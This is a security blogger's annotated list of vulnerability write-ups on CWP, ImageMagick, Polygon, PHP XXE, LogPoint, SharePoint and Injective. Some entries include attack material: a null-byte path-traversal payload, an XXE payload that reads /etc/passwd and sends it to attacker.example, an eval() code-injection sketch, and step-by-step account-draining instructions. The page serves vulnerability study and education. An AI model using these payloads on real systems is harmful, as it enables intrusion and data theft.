Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

CVE-2021-45467: CWP CentOS Web Panel - preauth RCE- 1943

pwn.ai    Reference →Posted 1 Day Ago
  • While reviewing CentOS Web Panel (CWP), they noticed an interesting protection for local file inclusion.
    PHP
    function GETSecurity($variable)
    {
      if (stristr($variable, "..")) {
         exit("hacking attempt");
      }
    }
    
  • Why was this interesting to them? stristr() is a case-insensitive substring search function. They had a few ideas for circumventing this check... First, get the routing to treat other characters as dots, but this yielded nothing.
  • Second was finding characters that PHP's underlying C code would treat as dots when lowercased. They reviewed the C implementation and saw that the input was converted to lowercase before the comparison was performed. The main idea was that the check and the use were slightly different, but this didn't yield any results either.
  • The final idea was tricking CWP into thinking that dots were NOT being used at all. After some fuzzing, they arrived at the payload /.%00./. The string comparison saw one thing, but the routing saw another. stristr effectively ignored the null byte, though they were not sure why.
  • This gave them a local file inclusion vulnerability. They reported it to ZDI, and it was patched. Overall, a good bug! I appreciated the thought process behind why they targeted this specific section of code, including the failures.
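  • The check/use differential can be sketched as a toy model (illustrative Python, not CWP's actual code; the real reason stristr ignored the null byte was unclear even to the researchers). The filter looks for a literal "..", so a path containing .%00. passes, while a hypothetical downstream consumer that drops NUL bytes sees a traversal:

```python
# Toy model of the CWP check/use differential (illustrative, not CWP's code).
def get_security(path: str) -> bool:
    """Mimics the GETSecurity() filter: reject paths containing '..'."""
    return ".." not in path.lower()

def resolve(path: str) -> str:
    """Hypothetical consumer that drops NUL bytes before resolving the path."""
    return path.replace("\x00", "")

payload = "/.\x00./etc/passwd"          # URL-decoded form of /.%00./etc/passwd
assert get_security(payload)             # filter sees '.\x00.' -> no '..' match
assert resolve(payload) == "/../etc/passwd"  # consumer sees a traversal
```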

ImageMagick: From Arbitrary File Read to File Write In Every Policy (ZeroDay)- 1942

pwn.ai    Reference →Posted 1 Day Ago
  • The author of this post is the creator of an autopwn bot. While on a customer engagement with a small, perfectly patched scope, it decided to tackle a dependency used by millions of websites: ImageMagick. After five days of searching, it had a zero-day RCE bug in the library's default configuration. This is the story of the vulnerabilities and the disclosure process.
  • On the first day, it learned that extension-based filtering doesn't work because ImageMagick mostly cares about magic bytes. From this, it determined that it could get SVGs processed at will, and it reviewed the SVG parser. Fairly quickly, it identified a file-read vulnerability when PostScript was enabled, but exploiting it required a very generous policy. The default policy blocks PS but not EPSI, allowing for an arbitrary file read. There are two issues here: the ability to read files at all and a bad deny-list.
  • After another day, it learned that shifting the magic bytes by adding a \n could defeat the PostScript detection. So, using GhostScript, you could write arbitrary files to the server just by reading a file. After it found a clear RCE vulnerability via the file write, the development team pushed back, saying that real users should have stricter policies in place, even though the default configuration still had the issue.
  • After this point, they moved their client to a very restrictive set of image policies. Upon doing this, the AI bot realized that the PS module was blocked but NOT the PDF module. By using the PDF path, which the maintainers consider fine in production, it achieved RCE again. Even after this, it found that the magic bytes C5 D0 D3 C6 overrode the extension-based format selection, allowing even jpgs to be processed as PostScript.
  • The most secure policy blocked all usage of delegates. This should theoretically catch all external process invocations and reject them. Unfortunately, this protection was busted in the case of GhostScript. When GhostScript is compiled into ImageMagick as a library, it runs in-process via gsapi_init_with_args(). So, the policy check never fires.
  • WordPress has no ImageMagick policy to begin with, making it vulnerable in many situations, depending on the website and the user's capabilities. In the end, the module was silently fixed without a CVE being assigned, and the fix wasn't backported to older versions. Practically, this means that a server running the library's defaults is vulnerable to some pretty nasty things. Only the core file-read and file-write issues were fixed; the PDF bypass and the gslib delegate execution issue were never fixed.
  • The maintainers treat strict policies as the security boundary, but that boundary looks very different in real-world usage than in maintainer expectations. As usual, if there are no good defaults, the protection is effectively null. Overall, a great post on ImageMagick's security and the use of LLMs to find bugs.
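  • The core differential can be sketched as a toy model (illustrative Python, not ImageMagick's code): the format router keys off magic bytes, while a naive policy keys off the filename. The magic value below is the DOS-EPS header mentioned in the post:

```python
# Toy model of the format-detection differential (illustrative, not
# ImageMagick's actual logic). The router picks a coder from magic bytes,
# while a naive policy is keyed on the claimed file extension.
EPS_MAGIC = bytes([0xC5, 0xD0, 0xD3, 0xC6])  # DOS-EPS header from the post

def detect_format(data: bytes, filename: str) -> str:
    if data.startswith(EPS_MAGIC):
        return "EPS"                          # magic bytes win over extension
    return filename.rsplit(".", 1)[-1].upper()

BLOCKED_BY_EXTENSION = {"PS", "EPS"}          # naive extension-based policy

def policy_allows(filename: str) -> bool:
    return filename.rsplit(".", 1)[-1].upper() not in BLOCKED_BY_EXTENSION

upload = EPS_MAGIC + b"...postscript payload..."
assert policy_allows("cat.jpg")                   # policy sees a harmless JPEG
assert detect_format(upload, "cat.jpg") == "EPS"  # router hands it to PostScript
```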

Tricking the Polygon bridge into withdrawals by forging transaction proofs- 1941

Hexens    Reference →Posted 1 Day Ago
  • Polygon is an EVM L2 solution. It has multiple bridges to move between Polygon and Ethereum. One of these is the Plasma bridge, which uses transaction receipts to prove incoming/outgoing transaction information for token transfers. The user just needs to provide a proof of a withdrawal event of the token on Polygon to claim it. This event contains the amount and receiver of the transfer.
  • The proving process is done on a Merkle Patricia State Trie, a structure used all over the EVM ecosystem that encodes data so its presence can be proven and searched. With a valid root hash and an existence proof within the state trie, it's possible to prove that the event happened. This requires that a checkpoint hash of the given block is proven.
  • The first vulnerability is an issue within the MerklePatriciaProof verification library. When verifying data against an MPT root hash, it requires the trie's nodes and path; the path is an RLP-encoded transaction index. Trie nodes carry prefixes that encode type and length information. The library allowed the proof to stop early at an extension node simply by providing a shorter proof path. This creates a parsing differential between reality and what the proof verifier sees. By doing this, the 7th parameter in the exit payload is completely controllable!
  • The RLPReader library had a memory-corruption issue during parsing. The code keeps a simple memory pointer and loops over each element: for each one, it adds the length value and copies the data to get the entry. The library blindly trusts a value's length field, not considering that it could point into other memory of the program. As a result, the parser can read beyond the expected bounds.
  • Now we have two issues: an out-of-bounds read and a parser differential. Without the OOB read, the parser differential is unexploitable, because the hash data used as the value is random and likely cannot be parsed into a valid transaction. To make this work, the extension node hash must be parsable as a valid receipt, which has a lot of requirements. They wrote a script to search the whole chain history for extension-node hashes that would work and did find a few.
  • The parser differential itself doesn't depend on which transaction is used; a single valid tx is enough for the exploit to work. Once we have the differential, we can use the out-of-bounds read to perform the exploit. To do so, we need Solidity to read from dirty memory (data that hasn't been cleaned up yet) containing data that we control. Because of the order of operations, only the ERC20PredicateBurnOnly code was affected: it has a CALL opcode before the parsing that writes controllable data to memory. By having the parser read this data, we can control the logs that are processed.
  • This exploit is super clever! It started from a small parsing discrepancy and then leveraged a bug in the RLPReader library. The developers likely made the reasonable assumption that all data processed by the library would already have been validated. That's true, but it doesn't account for a bug in the validation itself. Once you get past the initial validation, the code typically becomes much softer.
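  • The RLPReader flaw can be sketched as a toy model (illustrative Python, not the actual Solidity library): a parser that trusts an attacker-supplied length field walks past the end of the validated item into adjacent "dirty" memory:

```python
# Toy model of the RLPReader flaw (illustrative, not the Solidity library).
# Each item is [1-byte length][payload]; the length is never bounds-checked.
def parse_items(memory: bytes, start: int, end: int) -> list:
    items, pos = [], start
    while pos < end:
        length = memory[pos]
        items.append(memory[pos + 1 : pos + 1 + length])  # may read past `end`
        pos += 1 + length
    return items

# `memory` holds the validated proof item followed by unrelated, attacker-
# influenced bytes, like the CALL-written scratch space in the exploit.
proof  = bytes([4]) + b"good"
dirty  = b"ATTACKER-CONTROLLED"

# Honest parse stays inside the proof region.
assert parse_items(proof + dirty, 0, len(proof)) == [b"good"]

# A forged length (23 = 4 + 19) makes the parser read into the dirty region.
forged      = bytes([23]) + b"good"
evil_memory = forged + dirty
assert parse_items(evil_memory, 0, len(forged)) == [b"good" + dirty]
```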

Advanced Client Side Hacking- 1940

XSS Doctor & Jason Haddix    Reference →Posted 1 Day Ago
  • Client-side security is a little bit opaque to me. This is a course that focuses on practical exploitation of client-side vulnerabilities and how to chain these types of bugs together for greater impact.

Impossible XXE in PHP- 1939

Aleksandr Zhurnakov - Swarm PT    Reference →Posted 2 Days Ago
  • The code snippet the author shows should prevent XXE in PHP. External entity loading is disabled when the XML is loaded the first time, but NOT the second. There are four obstacles:
    1. Entities are set to an empty string during initial XML loading.
    2. Disallows external entities from being loaded into another.
    3. No networking URIs are allowed, such as http://.
    4. A check for XML_DOCUMENT_TYPE_NODE prevents normal entities from being used.
  • Condition three can be bypassed by using parameter entities. The network restriction doesn't actually matter in PHP, because it is only applied to the initial URI and not to nested ones. So, php://filter/resource=http://example.com can be used to bypass it.
  • Condition one prevents external entity loading out of the gate: the code removes all external entity references that it sees. It turns out that the SYSTEM attribute is parsed on the DOCTYPE tag, but declarations within the DOCTYPE's brackets are NOT removed on the first parse. This means the second parse will process the XXE. This happens because the DOCTYPE is considered part of the structural definition and shouldn't be touched.
  • The final obstacle is impact: how do we extract files? Parameter entities are defined and used within the same document, and libxml2 in PHP expands them under a different set of rules when LIBXML_DTDLOAD is enabled. The loading order is also interesting: parameter entities are expanded before anything else is used.
  • So, the final payload is as follows:
    1. Create a parameter entity that loads a file.
    2. Create a new entity that references the file in step 1.
    3. Call the entity, whose URL has the parameter entity from step 1 embedded in it. Because parameter expansion happens first, this sends the file contents to the attacker's server.
  • They found an exploitable path in SimpleSAMLphp and in another undisclosed product. Overall, this is a great post on vulnerability research and skipping past what looks like a "reasonable" defense.
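  • The steps above follow the classic parameter-entity exfiltration shape, sketched below. The host, target path, and filter chain are placeholders, and the exact escaping and entity placement depend on the libxml2/LIBXML_DTDLOAD quirks the post describes, so treat this as the shape of the payload, not a drop-in exploit:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!-- Step 1: parameter entity that reads the target file (path illustrative) -->
  <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
  <!-- Steps 2-3: define an entity whose SYSTEM URL embeds %file; -->
  <!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker.example/?d=%file;'>">
  %wrapper;
]>
<root>&exfil;</root>
```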

Don’t trust, verify- 1938

Daniel Stenberg    Reference →Posted 2 Days Ago
  • The author of this post is the maintainer of CURL. Their goal is to get users and consumers to verify CURL's software before using it. Why? Because attacks are everywhere and happening all the time.
  • A skilled member of the project team could deliberately add malicious code, as with the XZ backdoor. A maintainer could be compromised, allowing malicious code to be pushed. A rando could merge a "bugfix" that is actually a small step in a larger chain of pieces planted for a backdoor. A real maintainer could accidentally add code that creates a security vulnerability. The tarballs that host the code could get tampered with. A third-party CI used by the project could be hacked and used to exploit it.
  • Here's the point: you can verify. As the author, they do everything they can each week to improve CURL's code quality. You can review the code for bugs, review the release contents to ensure they are not tainted from the original, and much more.
  • Within the git repo itself, there are many things that can be done, including a list of 21 items the author mentions. Code styling, banning functions that are footguns, code review, banning binary blobs/unicode characters, documentation, fuzzing the code, security audits... There are a lot of things to be done.
  • They finish by saying that this is NOT paranoia; this is what allows them to sleep well at night. They take CURL's code quality and security seriously.

The Story of a Perfect Exploit Chain: Six Bugs That Looked Harmless Until They Became Pre-Auth RCE in a Security Appliance- 1937

mehmetince    Reference →Posted 5 Days Ago
  • The author of this post was evaluating the LogPoint SIEM/SOAR to replace their existing one. Before doing this, they decided to review it for vulnerabilities and immediately found three serious issues. Months later, they returned to look into deeper issues. Upon reviewing the source code, they found an interesting quirk: half of it ran natively while the other half ran in un-network-constrained Docker containers. This was because it was initially ONLY a SIEM but had to transition into a SOAR. The SOAR code runs in a Dockerized setup while the SIEM runs natively.
  • This led to two Nginx configurations: an external one for routing traffic and a Dockerized setup for routing traffic to the various microservices. Using the rewrite rules in the internal Nginx configuration, it's possible to hit some internal routes. This dramatically increases the attack surface.
  • The JWT verification on the SOAR backend has a hard-coded JWT secret. After using this JWT to log in, an API key is returned; this is sometimes used for authentication between microservices. Upon review, a single API key is returned for the user secbi, a high-privilege SOAR account that comes bundled with the installation. Perfect! This allows an anonymous user to call any of the SOAR endpoints on the LogPoint backend.
  • The new goal was to jump from the containerized application to the legacy backend. They found an endpoint that returned a separate secret key for the SOAR endpoint interacting with the legacy Python backend. If they could make a request to this, they could interact with the Python backend. Naturally, they found a GET-based SSRF on a configuration test. This could be used to find the secrets described above.
  • In the Python backend code, they found a simple eval() being performed by the rules engine. This is only reachable if they can create an alert with a payload for evaluation within the trigger_value, so they needed a way to create a rule that does exactly that. Luckily for them, there's a rule importer that bypasses most validation.
  • A pretty solid chain of issues that were mostly authentication-related. It was a fun read: six bugs chained together to eventually reach RCE.
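  • The eval() pattern can be sketched as a toy model (illustrative Python, not LogPoint's actual code; rule_matches and the event shape are made up for the sketch):

```python
# Toy model of an eval()-based rules engine (illustrative, not LogPoint's
# code): the rule's trigger_value string is evaluated as Python.
def rule_matches(trigger_value: str, event: dict) -> bool:
    # Dangerous pattern: the condition string is handed straight to eval().
    return bool(eval(trigger_value, {}, {"event": event}))

# Intended use: a harmless comparison expression.
assert rule_matches("event['severity'] > 5", {"severity": 9})

# An imported rule with a malicious trigger_value executes arbitrary code
# during evaluation (here, importing os and calling a function).
assert rule_matches("__import__('os').getpid() > 0", {})
```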

How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs- 1936

OtterSec    Reference →Posted 7 Days Ago
  • A common OAuth misconfiguration is allowlisting localhost for development purposes. When left enabled in production, this lets an application running on the victim's device steal OAuth codes via redirects to itself. The same issue can appear with CORS.
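  • A minimal sketch of the misconfiguration (illustrative Python; the hosts and function are made up): a redirect_uri check with development entries left enabled in production lets any local program receive the authorization code.

```python
# Toy redirect_uri check with development entries left enabled in
# production (hosts illustrative).
from urllib.parse import urlparse

ALLOWED_HOSTS = {"app.example.com", "localhost", "127.0.0.1"}  # dev leftovers

def redirect_allowed(redirect_uri: str) -> bool:
    return urlparse(redirect_uri).hostname in ALLOWED_HOSTS

# Any program on the victim's machine can bind a local port and receive
# the authorization code sent to this redirect.
assert redirect_allowed("http://127.0.0.1:8080/callback")
assert not redirect_allowed("https://evil.example/callback")
```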

SharePoint ToolShell – One Request PreAuth RCE Chain- 1935

viettel    Reference →Posted 7 Days Ago
  • The first vulnerability that the author found was a deserialization vulnerability. In SharePoint, there is arbitrary deserialization of DataSet and DataTable in some functions. Because DataSet is a well-known gadget in ysoserial, Microsoft has a filtering mechanism. It will strip out all other serialization information except for XmlSchema and XmlDiffGram.
  • The type validation only permits a simple type allowlist. However, this validation doesn't work on nested types, such as a type within an array. This allows bypassing the allowlist check and getting RCE via known deserialization gadgets. The attack requires authentication, so the author started looking for ways to trigger this functionality without auth. SharePoint has both generalized auth and page-level auth to circumvent.
  • It's possible to trigger simple ToolPane functionality to reach this. First, if the Referer header is set to a specific value, authentication is bypassed. Next, they needed to trigger the vulnerability before the page verification occurs in the Load() event. By combining the usage of ToolPane and SPWebPartManager, an attacker can force SharePoint to trigger the vulnerable code before the full ASP.NET lifecycle takes place. All of this was just reverse-engineering the application and seeing which paths could be hit.
  • The rest of the blog post is slightly hard to follow. Regardless, it's an interesting look into the ASP.NET and SharePoint security world. The bug is super impactful and a cool Pwn2Own entry.
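  • The nested-type gap can be sketched as a toy model (illustrative Python, not SharePoint's actual filter; the type names and declaration shape are made up):

```python
# Toy model of an allowlist that only validates the outer type
# (illustrative, not SharePoint's filter).
ALLOWED = {"String", "Int32", "Array"}

def validate(decl: dict) -> bool:
    # Bug: element types nested inside 'items' are never inspected.
    return decl["type"] in ALLOWED

gadget = {"type": "Array", "items": [{"type": "DangerousGadget"}]}
assert validate(gadget)  # the nested gadget type slips through

def validate_fixed(decl: dict) -> bool:
    # Fix: recurse into nested declarations as well.
    if decl["type"] not in ALLOWED:
        return False
    return all(validate_fixed(i) for i in decl.get("items", []))

assert not validate_fixed(gadget)
```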

One Missing Check, $500M at Risk: MsgBatchUpdateOrders Let Anyone Drain Any Account on Injective- 1934

al-f4lc0n    Reference →Posted 7 Days Ago
  • Injective is a Cosmos-based blockchain that includes an EVM runtime, in addition to the regular Cosmos features. It contains a subaccount module in which the account must be owned by the transaction signer.
  • The sub-account check actually ensures that the signer owns the specified sub-account. However, in the batching code within MsgBatchUpdateOrders, this check is not performed on three order types. This allows for complete circumvention of the security protection and gives attackers the ability to impersonate users on their operations.
  • To exploit this, an attacker would do the following:
    1. Create a worthless token.
    2. Create a spot market with FAKE/USDT.
    3. Place a sell order for FAKE/USDT. This will sell their worthless token for a valuable token.
    4. Use the vulnerability to force the victim to market buy the fake token. The attacker ends up with the valuable token.
    5. Bridge out of Injective to Ethereum with the USDT.
  • The vulnerability appears straightforward, but the aftermath wasn't. The vulnerability was submitted on November 30th, 2025. On December 1st, they fixed the issue. After a while, the whitehat asked for a follow-up but got nothing until February 11th, when they confirmed its validity. On March 5th, the bug bounty program offered a $50K bounty instead of the whitehat's expected maximum payout of $500K.
  • The impact of $500M seems off to me. At the time of writing, Injective's TVL is about $12M, so I don't know where the $500M comes from. Other than this, the statements from a now-deleted tweet from Injective seem pretty off. The whitehat responded in a Tweet as well. From changing conditions later to unresponsiveness, this seemed pretty bad. Immunefi paused Injective's bug bounty program for the time being.
  • Overall, a pretty simple vulnerability that had a tremendous impact. In a bear market, it's hard to get paid for your bugs, though. I feel for the whitehat, if all of the claims are accurate.
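  • The missing check can be sketched as a toy model (illustrative Python, not Injective's Cosmos module; the function and data shapes are made up): the single-order path verifies subaccount ownership, while the batch path skips it.

```python
# Toy model of the missing ownership check (illustrative, not Injective's
# actual module code).
def owns(signer: str, subaccount: str) -> bool:
    return subaccount.startswith(signer + "/")

def create_order(signer: str, order: dict) -> str:
    # Single-order path: ownership is verified.
    if not owns(signer, order["subaccount"]):
        raise PermissionError("subaccount not owned by signer")
    return "placed"

def batch_update_orders(signer: str, orders: list) -> list:
    # Bug: per-order ownership is never re-checked on this path.
    return ["placed" for _ in orders]

victim_order = {"subaccount": "victim/0", "side": "buy", "market": "FAKE/USDT"}

# Single-order path rejects the attacker...
try:
    create_order("attacker", victim_order)
    raise AssertionError("should have been rejected")
except PermissionError:
    pass

# ...but the batch path places orders on the victim's subaccount.
assert batch_update_orders("attacker", [victim_order]) == ["placed"]
```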